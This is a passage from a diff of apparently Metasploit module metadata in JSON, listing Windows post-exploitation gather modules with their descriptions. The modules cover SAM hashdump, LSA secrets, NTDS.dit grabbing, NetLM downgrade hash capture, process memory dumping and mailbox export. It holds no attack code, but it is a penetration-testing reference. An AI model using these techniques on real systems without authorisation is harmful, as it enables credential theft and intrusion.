If neither RHOST or SID\n are set it pulls the current user, else it will pull the user's settings\n for the specified SID and target host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-12-04 15:10:47 +0000", - "path": "/modules/post/windows/gather/enum_proxy.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_proxy", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_putty_saved_sessions": { - "name": "PuTTY Saved Sessions Enumeration Module", - "fullname": "post/windows/gather/enum_putty_saved_sessions", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session\n information from the registry. PuTTY is very configurable; some users may have configured\n saved sessions which could include a username, private key file to use when authenticating,\n host name etc. If a private key is configured, an attempt will be made to download and store\n it in loot. It will also record the SSH host keys which have been stored. 
These will be connections that\n the user has previously after accepting the host SSH fingerprint and therefore are of particular\n interest if they are within scope of a penetration test.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_putty_saved_sessions.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_putty_saved_sessions", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_services": { - "name": "Windows Gather Service Info Enumeration", - "fullname": "post/windows/gather/enum_services", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Keith Faber", - "Kx499" - ], - "description": "This module will query the system for services and display name and\n configuration info for each returned service. It allows you to\n optionally search the credentials, path, or start type for a string\n and only return the results that match. These query operations are\n cumulative and if no query strings are specified, it just returns all\n services. 
NOTE: If the script hangs, windows firewall is most likely\n on and you did not migrate to a safe process (explorer.exe for\n example).", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-09 17:27:19 +0000", - "path": "/modules/post/windows/gather/enum_services.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_services", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_shares": { - "name": "Windows Gather SMB Share Enumeration via Registry", - "fullname": "post/windows/gather/enum_shares", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate configured and recently used file shares.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-02 17:34:32 +0000", - "path": "/modules/post/windows/gather/enum_shares.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_shares", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "powershell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_snmp": { - "name": "Windows Gather SNMP Settings", - "fullname": "post/windows/gather/enum_snmp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Tebo " - ], - "description": "This module will 
enumerate the SNMP service configuration.", - "references": [ - "MSB-MS00-096", - "URL-https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-096" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-13 17:45:10 +0000", - "path": "/modules/post/windows/gather/enum_snmp.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_snmp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "powershell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_termserv": { - "name": "Windows Gather Terminal Server Client Connection Information Dumper", - "fullname": "post/windows/gather/enum_termserv", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module dumps MRU and connection data for RDP sessions.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_termserv.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_termserv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_tokens": { - "name": "Windows Gather Enumerate Domain Admin Tokens (Token Hunter)", - "fullname": "post/windows/gather/enum_tokens", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua Abraham " - ], - "description": 
"This module enumerates Domain Admin account processes and delegation tokens.\n\n This module will first check if the session has sufficient privileges\n to replace process level tokens and adjust process quotas.\n\n The SeAssignPrimaryTokenPrivilege privilege will not be assigned if\n the session has been elevated to SYSTEM. In that case try first\n migrating to another process that is running as SYSTEM.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_tokens.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_tokens", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_tomcat": { - "name": "Windows Gather Apache Tomcat Enumeration", - "fullname": "post/windows/gather/enum_tomcat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Barry Shteiman " - ], - "description": "This module will collect information from a Windows-based Apache Tomcat. 
You will get\n information such as: The installation path, Tomcat version, port, web applications,\n users, passwords, roles, etc.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_tomcat.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_tomcat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_trusted_locations": { - "name": "Windows Gather Microsoft Office Trusted Locations", - "fullname": "post/windows/gather/enum_trusted_locations", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vysec " - ], - "description": "This module will enumerate the Microsoft Office trusted locations on the target host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_trusted_locations.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_trusted_locations", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_unattend": { - "name": "Windows Gather Unattended Answer File Enumeration", - "fullname": "post/windows/gather/enum_unattend", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sean Verity ", - "sinn3r ", - "Ben Campbell ", - 
"GhostlyBox" - ], - "description": "This module will check the file system for a copy of unattend.xml and/or\n autounattend.xml found in Windows Vista, or newer Windows systems. And then\n extract sensitive information such as usernames and decoded passwords. Also\n checks for '.vmimport' files that could have been created by the AWS EC2 VMIE service.", - "references": [ - "URL-http://technet.microsoft.com/en-us/library/ff715801", - "URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx", - "URL-http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580", - "URL-https://aws.amazon.com/security/security-bulletins/AWS-2024-006/", - "URL-https://www.immersivelabs.com/blog/the-return-of-unattend-xml-revenge-of-the-cleartext-credentials/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_unattend.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_unattend", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/exchange": { - "name": "Windows Gather Exchange Server Mailboxes", - "fullname": "post/windows/gather/exchange", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "SophosLabs Offensive Security team" - ], - "description": "This module will gather information from an on-premise Exchange Server running on the target machine.\n\n Two actions are supported:\n LIST (default action): List basic information about all Exchange servers and mailboxes hosted on the target.\n EXPORT: Export and download a chosen mailbox in the form of a .PST file, with support for an optional 
filter keyword.\n\n For a list of valid filters, see https://docs.microsoft.com/en-us/exchange/filterable-properties-for-the-contentfilter-parameter\n\n The executing user has to be assigned to the \"Organization Management\" role group for the module to successfully run.\n\n Tested on Exchange Server 2010 on Windows Server 2012 R2 and Exchange Server 2016 on Windows Server 2016.", - "references": [ - "URL-https://github.com/sophoslabs/metasploit_gather_exchange", - "URL-https://news.sophos.com/en-us/2021/03/09/sophoslabs-offensive-security-releases-post-exploitation-tool-for-exchange/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/exchange.rb", - "is_install_path": true, - "ref_name": "windows/gather/exchange", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "EXPORT", - "description": "Export and download a chosen mailbox in the form of a .PST file, with support for an optional filter keyword" - }, - { - "name": "LIST", - "description": "List basic information about all Exchange servers and mailboxes hosted on the target" - } - ] - }, - "post_windows/gather/file_from_raw_ntfs": { - "name": "Windows File Gather File from Raw NTFS", - "fullname": "post/windows/gather/file_from_raw_ntfs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Danil Bazin " - ], - "description": "This module gathers a file using the raw NTFS device, bypassing some Windows restrictions\n such as open file with write lock. 
Because it avoids the usual file locking issues, it can\n be used to retrieve files such as NTDS.dit.", - "references": [ - "URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-03 12:57:40 +0000", - "path": "/modules/post/windows/gather/file_from_raw_ntfs.rb", - "is_install_path": true, - "ref_name": "windows/gather/file_from_raw_ntfs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/browser_history": { - "name": "Windows Gather Skype, Firefox, and Chrome Artifacts", - "fullname": "post/windows/gather/forensics/browser_history", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua Harper " - ], - "description": "Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/browser_history.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/browser_history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/duqu_check": { - "name": "Windows Gather Forensics Duqu Registry Check", - "fullname": "post/windows/gather/forensics/duqu_check", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "post", - "author": [ - "Marcus J. Carey " - ], - "description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.", - "references": [ - "CVE-2011-3402", - "URL-http://r-7.co/w5h7fY" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/duqu_check.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/duqu_check", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/enum_drives": { - "name": "Windows Gather Physical Drives and Logical Volumes", - "fullname": "post/windows/gather/forensics/enum_drives", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley McGrew " - ], - "description": "This module will list physical drives and logical volumes", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/enum_drives.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/enum_drives", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/fanny_bmp_check": { - "name": "FannyBMP or DementiaWheel Detection Registry Check", - "fullname": "post/windows/gather/forensics/fanny_bmp_check", - "aliases": [], - "rank": 
300, - "disclosure_date": null, - "type": "post", - "author": [ - "William M." - ], - "description": "This module searches for the Fanny.bmp worm related reg keys.\n fannybmp is a worm that exploited zero day vulns\n (more specifically, the LNK Exploit CVE-2010-2568).\n Which allowed it to spread even if USB Autorun was turned off.\n This is the same exploit that was used in StuxNet.", - "references": [ - "URL-https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787", - "CVE-2010-2568" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/windows/gather/forensics/fanny_bmp_check.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/fanny_bmp_check", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/imager": { - "name": "Windows Gather Forensic Imaging", - "fullname": "post/windows/gather/forensics/imager", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley McGrew " - ], - "description": "This module will perform byte-for-byte imaging of remote disks and volumes.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/imager.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/imager", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - 
"meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/nbd_server": { - "name": "Windows Gather Local NBD Server", - "fullname": "post/windows/gather/forensics/nbd_server", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley McGrew " - ], - "description": "Maps remote disks and logical volumes to a local Network Block Device server.\n Allows for forensic tools to be executed on the remote disk directly.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/forensics/nbd_server.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/nbd_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/forensics/recovery_files": { - "name": "Windows Gather Deleted Files Enumeration and Recovering", - "fullname": "post/windows/gather/forensics/recovery_files", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module lists and attempts to recover deleted files from NTFS file systems. Use\n the FILES option to guide recovery. Leave this option empty to enumerate deleted files in the\n DRIVE. Set FILES to an extension (e.g., \"pdf\") to recover deleted files with that\n extension, or set FILES to a comma separated list of IDs (from enumeration) to\n recover those files. The user must have account file enumeration. 
Recovery\n may take a long time; use the TIMEOUT option to abort enumeration or recovery by\n extension after a specified period (in seconds).", - "references": [ - "URL-https://www.youtube.com/watch?v=9yzCf360ujY&hd=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/forensics/recovery_files.rb", - "is_install_path": true, - "ref_name": "windows/gather/forensics/recovery_files", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/get_bookmarks": { - "name": "Bookmarked Sites Retriever", - "fullname": "post/windows/gather/get_bookmarks", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "jerrelgordon" - ], - "description": "This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-11 14:29:36 +0000", - "path": "/modules/post/windows/gather/get_bookmarks.rb", - "is_install_path": true, - "ref_name": "windows/gather/get_bookmarks", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/hashdump": { - "name": "Windows Gather Local User Account Password Hashes (Registry)", - "fullname": "post/windows/gather/hashdump", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "post", - "author": [ - "hdm " - ], - "description": "This module will dump the local user accounts from the SAM database using the registry", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/local_admin_search_enum": { - "name": "Windows Gather Local Admin Search", - "fullname": "post/windows/gather/local_admin_search_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon McCann \"zeknox\" ", - "Thomas McCarthy \"smilingraccoon\" ", - "Royce Davis \"r3dy\" " - ], - "description": "This module will identify systems in a given range that the\n supplied domain user (should migrate into a user pid) has administrative\n access to by using the Windows API OpenSCManagerA to establishing a handle\n to the remote host. 
Additionally it can enumerate logged in users and group\n membership via Windows API NetWkstaUserEnum and NetUserGetGroups.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/local_admin_search_enum.rb", - "is_install_path": true, - "ref_name": "windows/gather/local_admin_search_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/lsa_secrets": { - "name": "Windows Enumerate LSA Secrets", - "fullname": "post/windows/gather/lsa_secrets", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Rob Bathurst " - ], - "description": "This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:\n HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. 
Thanks goes to Maurizio Agazzini and Mubix for decrypt\n code from cachedump.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/lsa_secrets.rb", - "is_install_path": true, - "ref_name": "windows/gather/lsa_secrets", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/make_csv_orgchart": { - "name": "Generate CSV Organizational Chart Data Using Manager Information", - "fullname": "post/windows/gather/make_csv_orgchart", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will generate a CSV file containing all users and their managers, which can be\n imported into Visio which will render it.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/make_csv_orgchart.rb", - "is_install_path": true, - "ref_name": "windows/gather/make_csv_orgchart", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/memory_dump": { - "name": "Windows Process Memory Dump", - "fullname": "post/windows/gather/memory_dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "smashery" - ], - "description": "This module creates a memory dump of a 
process (to disk) and downloads the file\n for offline analysis.\n\n Options for DUMP_TYPE affect the completeness of the dump:\n\n \"full\" retrieves the entire process address space (all allocated pages);\n \"standard\" excludes image files (e.g. DLLs and EXEs in the address space) as\n well as memory mapped files. As a result, this option can be significantly\n smaller in size.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/memory_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/memory_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/memory_grep": { - "name": "Windows Gather Process Memory Grep", - "fullname": "post/windows/gather/memory_grep", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit " - ], - "description": "This module allows for searching the memory space of a process for potentially\n sensitive data. 
Please note: When the HEAP option is enabled, the module will have\n to migrate to the process you are grepping, and will not migrate back automatically.\n This means that if the user terminates the application after using this module, you\n may lose your session.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/memory_grep.rb", - "is_install_path": true, - "ref_name": "windows/gather/memory_grep", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/netlm_downgrade": { - "name": "Windows NetLM Downgrade Attack", - "fullname": "post/windows/gather/netlm_downgrade", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon McCann \"zeknox\" ", - "Thomas McCarthy \"smilingraccoon\" " - ], - "description": "This module changes the system LmCompatibilityLevel registry value\n to enable sending LM challenge hashes and initiates a SMB connection\n to the host specified in the SMBHOST module option. 
If an SMB server\n is listening, it will receive the NetLM hashes for the session user.", - "references": [ - "URL-https://web.archive.org/web/20210311141729/https://www.optiv.com/explore-optiv-insights/blog/post-exploitation-using-netntlm-downgrade-attacks", - "URL-https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level", - "URL-https://support.microsoft.com/en-us/topic/security-guidance-for-ntlmv1-and-lm-network-authentication-da2168b6-4a31-0088-fb03-f081acde6e73" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-10-01 22:35:11 +0000", - "path": "/modules/post/windows/gather/netlm_downgrade.rb", - "is_install_path": true, - "ref_name": "windows/gather/netlm_downgrade", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/ntds_grabber": { - "name": "NTDS Grabber", - "fullname": "post/windows/gather/ntds_grabber", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Koen Riepe (koen.riepe " - ], - "description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n It compresses all these files in a cabinet file called All.cab.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/ntds_grabber.rb", - "is_install_path": true, - "ref_name": "windows/gather/ntds_grabber", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/ntds_location": { - "name": "Post Windows Gather NTDS.DIT Location", - "fullname": "post/windows/gather/ntds_location", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will find the location of the NTDS.DIT file (from the Registry),\n check that it exists, and display its location on the screen, which is useful\n if you wish to manually acquire the file using ntdsutil or vss.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/ntds_location.rb", - "is_install_path": true, - "ref_name": "windows/gather/ntds_location", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/outlook": { - "name": "Windows Gather Outlook Email Messages", - "fullname": "post/windows/gather/outlook", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley Neelen " - ], - "description": "This module allows reading and searching email messages from the local\n Outlook installation using PowerShell. Please note that this module is\n manipulating the victims keyboard/mouse. If a victim is active on the target\n system, he may notice the activities of this module. 
